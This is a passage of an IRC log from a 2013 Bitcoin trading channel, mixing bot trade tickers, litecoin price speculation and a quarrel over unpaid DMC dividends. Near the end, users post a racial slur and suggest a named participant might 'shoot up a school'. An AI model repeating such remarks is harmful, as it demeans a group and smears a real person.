that. Apr 02 02:41:58 [HAVELOCK] [VTX] 5 @ 0.574999 = 2.875 BTC [+] Apr 02 02:42:29 why do people think BFL is actually shipping? Apr 02 02:42:46 is this some april fools joke I missed? Apr 02 02:44:07 no it's marketing campaing to promote idiff futures :D Apr 02 02:44:30 ha Apr 02 02:44:31 i actually lol'd Apr 02 02:45:01 the same reasone peeps believe in god is my guess Apr 02 02:47:37 [BTCTC] [ASICMINER-PT] 1 @ 0.75999 BTC [+] Apr 02 02:47:43 [BTCTC] [ASICMINER-PT] 4 @ 0.759999 = 3.04 BTC [+] Apr 02 02:54:14 so ian officially scam now Apr 02 02:54:19 baked well. Apr 02 02:54:29 cupcakes! Apr 02 02:55:58 [HAVELOCK] [SDICE] 5 @ 0.43 = 2.15 BTC [-] Apr 02 02:56:58 scamzor https://bitcointalk.org/index.php?topic=104489.320 Apr 02 02:56:58 [HAVELOCK] [SDICE] 2 @ 0.41 = 0.82 BTC [-] Apr 02 02:56:59 [HAVELOCK] [SDICE] 3 @ 0.4 = 1.2 BTC [-] Apr 02 02:57:58 [HAVELOCK] [SDICE] 2 @ 0.4 = 0.8 BTC [-] Apr 02 03:04:58 [HAVELOCK] [VTX] 2 @ 0.574999 = 1.15 BTC [+] Apr 02 03:05:45 !ticker h him Apr 02 03:05:46 [HAVELOCK:HIM] 1D: 2.06000000 / 2.06 / 2.06000000 (2 shares, 4.12000000 BTC), 7D: 1.45000000 / 1.872268 / 2.08000000 (175 shares, 327.64689996 BTC), 30D: 1.40000000 / 1.7876777 / 2.08000000 (733 shares, 1310.36775265 BTC) Apr 02 03:06:09 ;;asks 110 Apr 02 03:06:16 ;;bids 90 Apr 02 03:06:17 There are currently 10674.488 bitcoins offered at or under 110.0 USD, worth 1149842.29518 USD in total. | Data vintage: 0.0012 seconds Apr 02 03:06:17 There are currently 30415.187 bitcoins demanded at or over 90.0 USD, worth 2848518.63728 USD in total. | Data vintage: 0.0072 seconds Apr 02 03:06:29 ;;market --sell 30000 Apr 02 03:06:29 A market order to sell 30000 bitcoins right now would net 2811151.8105 USD and would take the last price down to 90.0000 USD, resulting in an average price of 93.7051 USD/BTC. | Data vintage: 12.6458 seconds Apr 02 03:07:15 ;;ticker Apr 02 03:07:21 BTCUSD ticker | Best bid: 104.00001, Best ask: 104.33999, Bid-ask spread: 0.33998, Last trade: 104.00000, 24 hour volume: 90714.89784916, 24 hour low: 92.23610, 24 hour high: 106.00000, 24 hour vwap: 100.05563 Apr 02 03:10:33 !ticker m s.mpoe Apr 02 03:10:34 [MPEX:S.MPOE] 1D: 0.0006 / 0.00060425 / 0.00061415 (271863 shares, 164.27 BTC), 7D: 0.0006 / 0.0006523 / 0.00068374 (2448763 shares, 1,597.33 BTC), 30D: 0.0006 / 0.00072549 / 0.00078628 (18056344 shares, 13,099.71 BTC) Apr 02 03:13:57 ;;bids 0 Apr 02 03:14:05 There are currently 35053741 bitcoins demanded at or over 0.0 USD, worth 9955250.10568 USD in total. | Data vintage: 0.0094 seconds Apr 02 03:14:08 $unconfirmed Apr 02 03:14:12 smickles: 997 unconfirmed transactions. Oldest dated: 2013-03-30 20:00:57 Apr 02 03:23:46 ;;nethash Apr 02 03:23:51 64542.718427 Apr 02 03:25:01 [MPEX] [S.MPOE] 15223 @ 0.0006 = 9.1338 BTC [-] Apr 02 03:25:02 [MPEX] [S.MPOE] 4058 @ 0.0005973 = 2.4238 BTC [-] Apr 02 03:25:04 [MPEX] [S.MPOE] 1619 @ 0.00059218 = 0.9587 BTC [-] Apr 02 03:35:45 [MPEX] [S.MPOE] 8500 @ 0.00061282 = 5.209 BTC [+] Apr 02 03:40:32 wat http://blockchain.info/tx/ff936e23d1f4b0b0f1dfab59070563acf69fbca19b7d589d590a31f0de3cdaac Apr 02 03:41:06 whats wrong? Apr 02 03:41:56 0.001 -> 0.0005 + 0.0005 txfee Apr 02 03:42:59 sent from 1Fuck to the btcentral addy Apr 02 03:43:33 lol Apr 02 03:44:28 someone caught giving a fuck? Apr 02 03:46:50 wow ltc really is gonna hit .02 Apr 02 03:47:28 [BTCTC] [ASICMINER-PT] 50 @ 0.740001 = 37.0001 BTC [-] Apr 02 03:48:16 [BTCTC] [ASICMINER-PT] 7 @ 0.74 = 5.18 BTC [-] Apr 02 03:49:35 [BTCTC] [ASICMINER-PT] 1 @ 0.7351 BTC [-] Apr 02 03:51:02 Get ready to close the BitBet :) http://bitbet.us/bet/297/litecoin-surges-to-02-bitcoins-per-litecoin Apr 02 03:51:08 [BTCTC] [ASICMINER-PT] 1 @ 0.7321 BTC [-] Apr 02 03:51:11 [BTCTC] [ASICMINER-PT] 2 @ 0.732 = 1.464 BTC [-] Apr 02 03:51:13 [BTCTC] [ASICMINER-PT] 1 @ 0.73 BTC [-] Apr 02 03:51:16 [BTCTC] [ASICMINER-PT] 1 @ 0.73 BTC [-] Apr 02 03:54:26 ltc at .199 Apr 02 03:57:59 [HAVELOCK] [VTX] 11 @ 0.574999 = 6.325 BTC [+] Apr 02 03:59:01 hm. who hosts a good btc-ltc chart? Apr 02 04:00:03 http://www.ltc-charts.com/ Apr 02 04:00:33 didnt quite make it to .02 :( Apr 02 04:00:36 thats all i know Apr 02 04:00:58 [HAVELOCK] [VTX] 8 @ 0.574999 = 4.6 BTC [+] Apr 02 04:03:58 [HAVELOCK] [VTX] 5 @ 0.57499999 = 2.875 BTC [+] Apr 02 04:13:43 Confirmed bets: 3001 Apr 02 04:14:24 in less than 3 months Apr 02 04:14:50 thats over 9000 per 9 months Apr 02 04:15:05 hehe Apr 02 04:17:57 [HAVELOCK] [HIM] 2 @ 2.0599 = 4.1198 BTC [-] Apr 02 04:21:57 I AM THE CLIT COMMANDER << ahahaha Apr 02 04:23:36 ha! BitBet has resolved ~400 btc worth of bets this month so far. Apr 02 04:23:41 it's april 2nd Apr 02 04:24:41 mod6 is commanding clit, don't disturb < lmao. o gawd, best comedy show in town this chan. Apr 02 04:25:11 ;;later tell thestringpuller yea, the MPCDO stuff tried to. Apr 02 04:25:11 The operation succeeded. Apr 02 04:25:16 the result was that everyone else defaulted. Apr 02 04:25:43 smickles << how'sgain limited ? Apr 02 04:26:25 one could've seen this recent loss coming before anyone else, and not been able to do anything about it << of fucking course. that is the point of it, you have to actually provide the service, as a bondholder. Apr 02 04:27:10 "1.0 BTC for 0 O.USD.P086T" << you're kinda misusing that. it's not really intended to do 1 contract at a time. do 1k. Apr 02 04:27:48 there's some high fees on the options this month... Apr 02 04:27:50 hm dub wtf is that Apr 02 04:27:58 did everyone up the % they ask on deposits? Apr 02 04:30:15 alt chains going crazy Apr 02 04:30:21 nmc doubled today Apr 02 04:33:26 [BTCTC] [S.MPOE-PT] 120 @ 0.000639 = 0.0767 BTC [+] Apr 02 04:33:55 heh Apr 02 04:34:06 i think the driving force here is just how poor / desperate americans are. Apr 02 04:34:08 [BTCTC] [S.MPOE-PT] 9 @ 0.000648 = 0.0058 BTC [+] Apr 02 04:34:11 [BTCTC] [S.MPOE-PT] 47 @ 0.000658 = 0.0309 BTC [+] Apr 02 04:34:19 [BTCTC] [S.MPOE-PT] 652 @ 0.000674 = 0.4394 BTC [+] Apr 02 04:34:26 they will basically spend 2x to buy some ersatz of anything just as long as it's niominally cheaper. Apr 02 04:34:28 wit the alts? Apr 02 04:34:30 heh no love Apr 02 04:34:31 yeah Apr 02 04:34:37 "i am getting A DEAL!!!!" Apr 02 04:34:37 dunno Apr 02 04:34:46 NVC is russian domain Apr 02 04:35:02 trading higher than 'long' established LTC Apr 02 04:35:02 "by buying tv dinners which are just as good as actual food, i only pay $5 instead of $50!!11" Apr 02 04:35:17 except tv dinners aren't really just as good as actual food. Apr 02 04:35:53 why buy 10 fax rolex when you can buy 1 real one Apr 02 04:35:55 in fact the costs of maintaining your metabolic health on junk food are about 2x what you'd pay if you just ate cooked stuff. Apr 02 04:35:58 fake Apr 02 04:36:07 jborkl i dunno, but more fakes are sold than original. Apr 02 04:36:33 poor people make bad choices Apr 02 04:36:37 anyway. just a theory. Apr 02 04:36:41 [BTCTC] [S.MPOE-PT] 1029 @ 0.000675 = 0.6946 BTC [+] Apr 02 04:36:47 [BTCTC] [S.MPOE-PT] 281 @ 0.000675 = 0.1897 BTC [+] Apr 02 04:37:11 https://twitter.com/BitBetsBets/status/318899438645047296 Apr 02 04:37:18 meanwhile ~2500 bux bet on litecoin hehe Apr 02 04:37:38 https://twitter.com/BitBetsBets/status/318897459424264192 Apr 02 04:37:39 emm Apr 02 04:39:28 heh. Apr 02 04:39:34 has it actually crossed ? Apr 02 04:39:55 not yet Apr 02 04:40:01 ahahaha tell you waht... if it fizzles now... Apr 02 04:40:03 o gawd. Apr 02 04:40:19 too bad that wasnt a late bet :p Apr 02 04:40:23 but anyway https://btc-e.com/exchange/ltc_btc Apr 02 04:40:26 nono. good it wasn't. Apr 02 04:40:39 any time now Apr 02 04:40:45 28/03/13 Temporarily no accept liqpay Apr 02 04:40:49 please no disturb Apr 02 04:40:51 dwolla got. Apr 02 04:41:39 so basically the reason russians are so weak in btc is that for whatever reasons they've decided to move to ltc at some point ? Apr 02 04:41:56 NVC Apr 02 04:42:50 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Apr 02 04:49:58 [HAVELOCK] [VTX] 6 @ 0.565 = 3.39 BTC [-] Apr 02 04:52:20 < mircea_popescu> "1.0 BTC for 0 O.USD.P086T" << you're kinda misusing that. it's not really intended to do 1 contract at a time. do 1k. <<< i'm not sure i'd want to do 1k if i can't predict what i'm going to get out of it Apr 02 04:52:33 but you're currently fighting with a rounding error. Apr 02 04:52:48 your 1k would be between 896 or 895, ie, either Apr 02 04:52:52 your 1 is either 1 or 0 Apr 02 04:52:55 big diff Apr 02 04:53:04 (not actual figures) Apr 02 04:53:58 [HAVELOCK] [VTX] 2 @ 0.565 = 1.13 BTC [-] Apr 02 04:56:49 i don't mind a rounding error, but i'd like to be able to ensure i'm on the 896 side w/o risking going to 897 Apr 02 04:57:33 as it is now, i have that risk, and it's still unquantifiable :o Apr 02 04:58:42 well if you need 1 contract granularity there's a problem Apr 02 04:58:51 0.1% i mean Apr 02 04:59:29 it's easy enough for calls - those always give you exactly the btc Apr 02 04:59:32 $2 ltc? oh lol Apr 02 04:59:38 but on puts i don't think it'll ever be doable. Apr 02 04:59:42 ChaangNoi it crossed ? Apr 02 04:59:47 its close Apr 02 04:59:52 not crossed Apr 02 05:00:00 [HAVELOCK] [SDICE] 4 @ 0.402 = 1.608 BTC [+] Apr 02 05:00:02 but soon:) Apr 02 05:00:12 http://youtu.be/x4-ChcL6Pzo << I AM THE CLIT COMMANDER Apr 02 05:00:15 if it never crosses that bitbet is going to be a pain Apr 02 05:00:48 the high ratio was .0199 when btc on gox was over $100 so it sorta was over $2, Apr 02 05:01:06 oh, i dont know about the bitbet Apr 02 05:01:58 [HAVELOCK] [SDICE] 5 @ 0.4005 = 2.0025 BTC [-] Apr 02 05:02:24 and: WHAT THE FUCK IS THE INTERNET << http://youtu.be/h5tcAXMDxfY Apr 02 05:02:31 here is you litecoin bet Apr 02 05:02:32 http://bit.ly/17a28Zy Apr 02 05:03:53 kako that a price and asks chart? Apr 02 05:03:58 [HAVELOCK] [SDICE] 1 @ 0.40000001 BTC [-] Apr 02 05:04:06 no Apr 02 05:04:11 !ticker h HIM Apr 02 05:04:13 [HAVELOCK:HIM] 1D: 2.05990000 / 2.05995 / 2.06000000 (4 shares, 8.23980000 BTC), 7D: 1.45000000 / 1.87438814 / 2.08000000 (177 shares, 331.76669996 BTC), 30D: 1.40000000 / 1.78841844 / 2.08000000 (735 shares, 1314.48755265 BTC) Apr 02 05:04:18 its a 'histograph' Apr 02 05:04:21 http://bitbet.us/bet/297/litecoin-surges-to-02-bitcoins-per-litecoin/ Apr 02 05:04:27 see? Apr 02 05:04:29 i see how it is assbot Apr 02 05:04:32 ;;ticker Apr 02 05:04:38 oh, its a chart of the bet Apr 02 05:04:38 BTCUSD ticker | Best bid: 103.10001, Best ask: 103.70000, Bid-ask spread: 0.59999, Last trade: 103.70000, 24 hour volume: 92564.85061965, 24 hour low: 92.23610, 24 hour high: 106.00000, 24 hour vwap: 100.26209 Apr 02 05:04:43 yes and no's Apr 02 05:04:45 got ya Apr 02 05:04:48 correct Apr 02 05:04:58 [HAVELOCK] [SDICE] 6 @ 0.4 = 2.4 BTC [-] Apr 02 05:05:33 mircea_popescu: well, i gotta complain about something ;) Apr 02 05:06:01 oh smickles, were you looking for me? Apr 02 05:06:12 i would have never expected ltc to go up this fast, its crzy Apr 02 05:06:25 smickles :p Apr 02 05:06:35 ChaangNoi tell me about it. im sorry i got out Apr 02 05:06:47 i sold about 60% of my ltc Apr 02 05:06:49 mod6: naw, not really, i just wanted the seen command to repeat your last line again :) Apr 02 05:07:02 :D Apr 02 05:07:02 in the 40 to 75 cent range, and i thought i was doing well at the time, lol Apr 02 05:07:15 I love jay & silent bob. Apr 02 05:07:19 if gox lists litecoin, it will be huge for ltc Apr 02 05:07:57 [HAVELOCK] [SDICE] 6 @ 0.4 = 2.4 BTC [-] Apr 02 05:08:04 the lag will be made worse by expanding the product line Apr 02 05:08:58 [HAVELOCK] [VTX] 3 @ 0.5748 = 1.7244 BTC [+] Apr 02 05:09:31 smickles no because infinity is selfequal :D Apr 02 05:09:54 you really wanna start talking about set theory mircea_popescu ? Apr 02 05:09:58 [HAVELOCK] [VTX] 5 @ 0.565 = 2.825 BTC [-] Apr 02 05:10:05 sure. Apr 02 05:10:33 (just kidding) Apr 02 05:10:37 well, not that i'm well versed on the topic, but ... oh Apr 02 05:10:48 you got me! Apr 02 05:11:17 the power, i has it Apr 02 05:12:00 tiberslav! Apr 02 05:12:18 ltc adds to the value of btc:) Apr 02 05:12:32 its like if there was only the usd then lulz but cuz other fiat too they all gain Apr 02 05:13:03 lol you think that 20 million only came from btc and not fiat? lhahahalolhaha Apr 02 05:13:12 let's be serious here. People are so desperate to get in on something 'cheap' that might explode in price, they are driving up another spec bubble in litecoin Apr 02 05:13:33 most people are probably buying it with BTC Apr 02 05:13:41 bugpowder once ltc is listed on gox i see ltc tradeing in the $15 range soon Apr 02 05:13:56 jesus christ no Apr 02 05:14:07 this is a fucking few day blip Apr 02 05:14:11 you think it will get to the $20s? Apr 02 05:14:15 Bugpowder yup Apr 02 05:15:00 its hard to get USD into BTC-e, so most is probably BTC buyers Apr 02 05:15:12 also, it didn't take 20MM off the cap Apr 02 05:15:17 yep Apr 02 05:15:19 exactly Apr 02 05:15:29 or maybe a few medium players Apr 02 05:15:33 looking for a quick flip Apr 02 05:15:43 I almost pulled the trigger this morning Apr 02 05:15:58 but I just don't want to get off the BTC train Apr 02 05:16:30 i have traded btc for ltc for over a yeay and had all my ltc paid for so i just held to see what would happen Apr 02 05:16:52 im pleased to see this but really, gox is just going to make the price jump more Apr 02 05:17:15 tiberslav even so, im very pleased:) Apr 02 05:17:27 lol Apr 02 05:17:45 lol Apr 02 05:17:51 econ 101, try that Apr 02 05:17:52 It took $2M total volume to >2x the price Apr 02 05:18:56 i clearly dont need to go back to econ 101, i ahve the phat wallets to prove it:) Apr 02 05:19:57 [HAVELOCK] [SDICE] 4 @ 0.4 = 1.6 BTC [-] Apr 02 05:20:00 for some lolz go check the nmc price on btc-e Apr 02 05:20:12 phat wallets ?! when did that happen. Apr 02 05:20:38 well they are giant compared to tiberslav, i doubt im at your level Apr 02 05:20:48 o that guy Apr 02 05:21:02 you have him on ignore? Apr 02 05:21:28 tiberslav do you even have a whole btc? Apr 02 05:21:42 that is frkn awesome you guys are set Apr 02 05:21:52 see that is just a good problem to have, be able to lose that much and stil be like whatever Apr 02 05:22:00 i imagine it might be hard to unload all that btc for currency Apr 02 05:22:13 oh tiberslav Apr 02 05:22:49 tiberslav your exparts are amazing Apr 02 05:23:07 uncle sam come knocking for that 40% too Apr 02 05:23:17 tiberiusiv: 1-2 more straight up months with no late pullbacks, he will be in pain Apr 02 05:23:21 I WILL PUT HIM IN PAIN Apr 02 05:23:38 moar Apr 02 05:23:46 dip in the last 24hr Apr 02 05:24:00 If it goes up and down, he gonna make da money Apr 02 05:24:23 he wins the more often move in an out of a position Apr 02 05:24:26 30% spread Apr 02 05:24:51 couch Apr 02 05:24:52 cough Apr 02 05:25:02 $50 million last month in exposure Apr 02 05:25:35 19k was principal loss Apr 02 05:26:14 its pretty obvious is you watch the trades Apr 02 05:26:32 so which is it, is he going broke, or has not lost anything left Apr 02 05:26:35 yet Apr 02 05:26:58 [HAVELOCK] [SDICE] 2 @ 0.4 = 0.8 BTC [-] Apr 02 05:27:21 heh Apr 02 05:27:36 KRS1 not everybody lives in ridiculous slavepen. Apr 02 05:27:37 I know personally about more than 1/100th of the volume Apr 02 05:28:16 !ticker m s.bbet Apr 02 05:28:17 [MPEX:S.BBET] 1D: 0.00201393 / 0.00201393 / 0.00201394 (15000 shares, 30.21 BTC), 7D: 0.00050015 / 0.00199592 / 0.002014 (25320 shares, 50.54 BTC), 30D: 0.00050015 / 0.00183401 / 0.00201401 (157420 shares, 288.71 BTC) Apr 02 05:29:37 kakobrekla i just realised you're a nominal millionaire. Apr 02 05:29:58 [HAVELOCK] [SDICE] 1 @ 0.40199999 BTC [+] Apr 02 05:29:59 [HAVELOCK] [SDICE] 1 @ 0.42899998 BTC [+] Apr 02 05:30:01 [HAVELOCK] [SDICE] 13 @ 0.42899999 = 5.577 BTC [+] Apr 02 05:30:02 [HAVELOCK] [SDICE] 1 @ 0.44499999 BTC [+] Apr 02 05:30:25 funny, earlier today, i realized i could pay off my car loan Apr 02 05:30:40 chevy, actually Apr 02 05:31:01 '08 trailblazr Apr 02 05:31:15 not bad. Apr 02 05:31:37 nmc price oh lol Apr 02 05:31:46 i just sold 90% of what i had Apr 02 05:32:09 O_o Apr 02 05:32:31 i had some cuz maybe they could use it for something later, but i saw the jump and was like fuck it Apr 02 05:32:38 then it crashed lol Apr 02 05:32:58 one day all this will go to shit Apr 02 05:34:13 ChaangNoi dump some nmc so we get some more no bets on the 0.02 before it breaks it Apr 02 05:34:21 would be fun Apr 02 05:34:25 it might not break Apr 02 05:35:07 kako nmc not ltc Apr 02 05:35:10 you have a bet on that too? Apr 02 05:35:14 i mean ltc Apr 02 05:35:16 sorry Apr 02 05:35:19 fuckin alts Apr 02 05:35:23 messing with mah mind Apr 02 05:35:31 i sold nmc cuz that spike lol Apr 02 05:35:46 ill just stfu and go back to wekr Apr 02 05:36:16 :) Apr 02 05:39:17 herro? Apr 02 05:39:27 I installed an IRC client! Apr 02 05:39:37 just so I can ignore tiberiusiv Apr 02 05:39:48 lol, that's your reason? Apr 02 05:39:53 yep Apr 02 05:40:07 lol Apr 02 05:40:16 It has taken me a whole year Apr 02 05:40:16 ;;rate tiberiusiv 1 motivates people Apr 02 05:40:17 Error: For identification purposes, you must be authenticated to use the rating system. Apr 02 05:40:25 sonofabitch Apr 02 05:41:03 d:) Apr 02 05:41:08 I have emoticons now Apr 02 05:41:24 No you don't Apr 02 05:41:38 yes I do they are so cool Apr 02 05:42:12 That last one has a hat Apr 02 05:42:56 $avg Apr 02 05:42:57 ThickAsThieves: 99.57 Apr 02 05:43:21 ;;nethash Apr 02 05:43:26 63993.8839795 Apr 02 05:43:46 Econ Pa, he economics at you Apr 02 05:43:49 http://blog.smickles.com/wp-content/uploads/sites/3/2013/04/Economics-At-You.png Apr 02 05:43:59 thats like 8 new TH in a week, no? Apr 02 05:44:15 hrm Apr 02 05:44:35 it was at 58, then dropped to 51 for a few days, been climbing since Apr 02 05:44:53 where does it all come from? Apr 02 05:44:55 and its 3d avg Apr 02 05:44:56 ;;bids 0 Apr 02 05:44:57 There are currently 35146688 bitcoins demanded at or over 0.0 USD, worth 10247783.7207 USD in total. | Data vintage: 5.9890 seconds Apr 02 05:45:03 $unconfirmed Apr 02 05:45:06 smickles: 1010 unconfirmed transactions. Oldest dated: 2013-03-31 01:54:01 Apr 02 05:45:18 it hit 80000 on sipa Apr 02 05:45:24 even known AM, Avalon and GPUs can't account for that much can it? Apr 02 05:45:44 i suspect bfl to be "testing" Apr 02 05:45:53 and avalon Apr 02 05:45:54 and AM Apr 02 05:46:19 all, yknow just hashin a lil Apr 02 05:47:27 Err… bitcoin at 104+ interesting. Apr 02 05:47:36 yawn Apr 02 05:47:38 dude BFL shipped already Apr 02 05:47:43 lol Apr 02 05:47:44 get with teh times Apr 02 05:47:48 ;;bids 0 Apr 02 05:47:49 There are currently 35147078 bitcoins demanded at or over 0.0 USD, worth 10258338.809 USD in total. | Data vintage: 24.8391 seconds Apr 02 05:47:53 heyo Apr 02 05:48:08 yeah they shipped a cellphone pic of the unit Luke was remoting into Apr 02 05:48:09 There are currently 14814.273 bitcoins offered at or under 120.0 USD, worth 1632425.24456 USD in total. | Data vintage: 45.1614 seconds Apr 02 05:48:44 http://www.forbes.com/sites/timothylee/2013/04/01/bitcoin-is-a-bad-currency-but-it-might-be-a-good-platform-for-financial-innovation/ Apr 02 05:48:52 I think we have a 50% chance of hitting 200 this month Apr 02 05:49:05 hao about $2 Apr 02 05:49:05 its bad cuz i dont own any so make a new one taht i can? Apr 02 05:49:14 Bug, I agree Apr 02 05:49:23 I think $150 easy Apr 02 05:49:48 the demand is just insane Apr 02 05:49:56 not insane Apr 02 05:50:00 strong Apr 02 05:50:48 :asks 10000 Apr 02 05:50:53 ;;asks 10000 Apr 02 05:50:54 There are currently 39501.232 bitcoins offered at or under 10000.0 USD, worth 13402145.1671 USD in total. | Data vintage: 23.2896 seconds Apr 02 05:51:29 only 39501 bitcoins left til bitcoin singularity Apr 02 05:51:54 I like the jist of the forbes article.. Bitcoin is bad "currency" but a great enabler of innovation in the finance space. (They didn't say it, but it's akin to the innovation to publishing that the internet brought.. e.g. self publishing, decentralization, room for new leaders and business models, etc.) Apr 02 05:52:06 singularity? Apr 02 05:52:11 ahh Apr 02 05:52:48 Realistially I'm sure sellers would come out of the woodwork if btc started making a race for 10k Apr 02 05:52:59 ;;asks 500 Apr 02 05:53:06 There are currently 36910.854 bitcoins offered at or under 500.0 USD, worth 6594850.84906 USD in total. | Data vintage: 0.0058 seconds Apr 02 05:53:17 cheap! Apr 02 05:53:24 realistically and 10k Apr 02 05:53:33 in the same sentence Apr 02 05:53:36 interesting Apr 02 05:53:39 hehe Apr 02 05:53:45 theoritically? Apr 02 05:53:55 *shrug* Apr 02 05:53:59 btc at 10k, i'll have some purchases to make Apr 02 05:54:15 yeah this room would be empty Apr 02 05:54:23 or filled with litecoin moguls Apr 02 05:54:33 hell even though I'm a big fan, I could lighten my position by a asmall amount and have the proceeds have a serious impat on my life. Apr 02 05:56:32 so I think today is lets make fun of Luke-Jr Apr 02 05:56:45 Luke-Jr refuses to get his BitFunder account so he can get DMC dividends. Apr 02 05:56:45 I will sell another chunk at 190 Apr 02 05:57:06 That worked quite well. Apr 02 05:57:26 I should post a scammer tag request for Diablo-D3 just for the lulz Apr 02 05:57:42 nefario tried that once Apr 02 05:57:49 karma hit him like a truck Apr 02 05:57:49 Ukto: it's your fault Diablo-D3 is a scammer btw Apr 02 05:58:12 the funny here is that Luke-Jr invested in DMC Apr 02 05:58:29 dub: exactly Apr 02 05:58:36 dub: Diablo-D3 refuses to give me my dividends Apr 02 05:58:43 the funny here is he wont fix his account because HIS DIVIDENDS ARE IN HIS ACCOUNT Apr 02 05:59:02 I have zero access to other customer's accounts because, you know, that'd be illegal. Apr 02 05:59:15 0,0 Apr 02 05:59:16 what ? Apr 02 05:59:26 that'd be like luke calling up Apple because he wants his dividends instead of calling up Vangard Apr 02 05:59:31 Ukto: Diablo-D3 is blaming you for his not paying my dividends Apr 02 05:59:46 Ukto: no, Im blaming Luke-Jr for not talking to you to get his account fixed Apr 02 05:59:48 everyone blames me for everything Apr 02 05:59:53 I will accept your love. Apr 02 05:59:54 :P Apr 02 06:00:03 I don't want to use BitFunder, I just want my dividends. Apr 02 06:00:03 ;;bids 100 Apr 02 06:00:06 There are currently 6961.6516 bitcoins demanded at or over 100.0 USD, worth 708089.196113 USD in total. | Data vintage: 0.0043 seconds Apr 02 06:00:14 my relationship with DMC was via GLBSE Apr 02 06:00:15 ;;market sell 50000 Apr 02 06:00:15 A market order to sell 50000 bitcoins right now would net 4580113.0445 USD and would take the last price down to 80.0000 USD, resulting in an average price of 91.6023 USD/BTC. | Data vintage: 9.8758 seconds Apr 02 06:00:16 not BitFunder Apr 02 06:00:20 Luke-Jr: I'm sorry. Apr 02 06:00:28 I can't do anything to countermand that. Apr 02 06:00:51 so it's Diablo-D3's fault, as I suspected Apr 02 06:00:54 SCAMMER TAG TIME Apr 02 06:01:01 Luke-Jr: I have DMC in my BitFunder accnt .. if we can figure out some way to xfer your DMC shares into mine I'd be happy to pass along a %age of your divs Apr 02 06:01:12 Ukto: he cant log into his account Apr 02 06:01:18 You can pay me to get it out of BitFunder for you Apr 02 06:01:19 toffoo: he'd need to log in first Apr 02 06:01:19 toffoo: the reason I'm not using BitFunder is that it doesn't work Apr 02 06:01:22 BitFunder currentl has no method to pay dividends to non-user accounts Apr 02 06:01:31 Luke-Jr: at no point did you hold shares directly with DMC Apr 02 06:01:31 tiberiusiv: bye troll Apr 02 06:01:32 Luke-Jr: are you having login issues? Apr 02 06:01:38 or just dont wanna sign up Apr 02 06:01:41 if you had, I'd e paying you shares directly Apr 02 06:01:44 I do not offer such a service. Apr 02 06:01:49 Ukto: I signed up, and tried to claim my GLBSE crap, and it didn't work Apr 02 06:01:58 Luke-Jr: and you didnt even email tech support Apr 02 06:02:01 this is why everyone laughs at you Apr 02 06:02:07 Luke-Jr: Then let me help you :) Apr 02 06:02:09 Diablo-D3: nonsense, I bought my shares before they were on GLBSE even! Apr 02 06:02:26 I'm sure Ukto can sort out Luke-Jr.. (Can you guys please take it offline though.) Apr 02 06:02:46 tiberiusiv: man, I kinda like your trolling style but Luke-Jr is the ubertroll, you should give up at this point Apr 02 06:02:50 besides, I'm busy killing litecoin atm Apr 02 06:03:06 Luke-Jr: gonna have to fight tux on that one. he's trying to make it bigger :P Apr 02 06:03:11 [BTCTC] [BTC-TRADING-PT] 1 @ 0.189 BTC [+] Apr 02 06:03:13 doesn't look like that's been too successful today Apr 02 06:03:16 Luke-Jr: When you clicked on the claim link in bitfunder, did it already show a DMC share pending? or is your email address on BitFunder different than GLBSE? Apr 02 06:03:17 [BTCTC] [BTC-TRADING-PT] 7 @ 0.1895 = 1.3265 BTC [+] Apr 02 06:03:23 Luke-Jr: you had the loan repaid in shares, nothing more, nothing less Apr 02 06:03:23 Luke-Jr and how you gonna kill litecoin? Apr 02 06:03:32 kakobrekla: FPGAs Apr 02 06:03:42 tiberiusiv: srsly, nothing we can say to Luke-Jr is more fucked up than the shit floating around in his head Apr 02 06:03:46 Ukto: I forget, it was months ago Apr 02 06:03:49 Diablo-D3: I have not looked, does he have a pending claim on the system? Apr 02 06:03:51 Luke-Jr FPGAs ? Apr 02 06:04:02 Ukto: Tux is *why* I'm bothering to kill litecoin Apr 02 06:04:03 Ukto: I presume so, but obviously I cant go look Apr 02 06:04:04 now Apr 02 06:04:11 maybe that would kill GPU/CPU miners, but not litecoin Apr 02 06:04:22 is that litecoin on gox even conifrmed? Apr 02 06:04:23 toffoo: I just shut off transactions once I have 99% Apr 02 06:04:25 Ukto: he, in the past, has held DMC shares Apr 02 06:04:35 Ukto: I do not know if he currently does Apr 02 06:04:56 Diablo-D3: yes, shares from DMC. Apr 02 06:05:04 I see the issue I think Apr 02 06:05:11 Luke-Jr: pm? :) Apr 02 06:05:23 omg bitbet is about to pay off Apr 02 06:05:39 i want an ERB Luke-Jr vs tiberiusiv Apr 02 06:05:42 Ukto: sure Apr 02 06:05:43 thestringpuller: here, lemme throw 10btc in real quick to no Apr 02 06:05:43 Luke-Jr: and you're asking me after the third dividend payment sent to DMC shareholders as well Apr 02 06:05:46 but I'm busy as heck Apr 02 06:05:55 smickles: catholic style vs dirty negro style? Apr 02 06:05:56 Diablo-D3: YOU SCAMMED ME OUT OF 2 BEFORE THIS⁈/ Apr 02 06:06:06 Luke-Jr: SUBSCRIBE TO THE FUCKING THREAD Apr 02 06:06:44 [BTCTC] [BTC-BOND] 9 @ 0.01 = 0.09 BTC [+] Apr 02 06:07:41 lmao finally. Bugpowder now you can log chats! Apr 02 06:07:53 the chats weren't logged? Apr 02 06:08:35 they are logged by others, but not me Apr 02 06:08:43 bgupta orly , forbes knows =shiot now. Apr 02 06:09:15 Diablo-D3: what were the divs btw? I guess if we hit $5k I might need to claim my 1 DMC Apr 02 06:09:39 (that I bought for 1 satoshi) Apr 02 06:09:54 the funny here is that Luke-Jr invested in DMC <<< Apr 02 06:10:21 https://bitcointalk.org/index.php?topic=164550 heh. Apr 02 06:10:44 dub: this month was ~55 over 10k shares Apr 02 06:10:51 well the funny in that is that my bid at 0.00000001 filled Apr 02 06:11:03 [MPEX] [S.DICE] 3 @ 0.00398998 = 0.012 BTC [+] Apr 02 06:11:09 didnt that get filled on like the last day of glbse or something? Apr 02 06:11:22 don't think so Apr 02 06:11:53 this lukejr talk about killing is worrisome Apr 02 06:12:07 he's certainly the one bitcoiner most likely to go shoot up a school or some shit Apr 02 06:12:19 lulz Apr 02 06:12:22 he has that look Apr 02 06:12:24 to fully disclose I held a great many more DMC shares for short periods as I assisted in destroying their value Apr 02 06:12:44 $avg Apr 02 06:12:45 ThickAsThieves: 99.80 Apr 02 06:12:48 mircea_popescu: Interestingly the author is long btc.. anyway, the point is you don't need to accept that btc has the characteristics that make a currency useful, to see that it is useful. It seems to trade like a hybrid between some collectible, a currency, and a early stage startup's equity. Apr 02 06:12:55 so bfl giving a asic to jr, bad pr? Apr 02 06:13:04 no pr Apr 02 06:13:11 if BFL was truly legitimate Apr 02 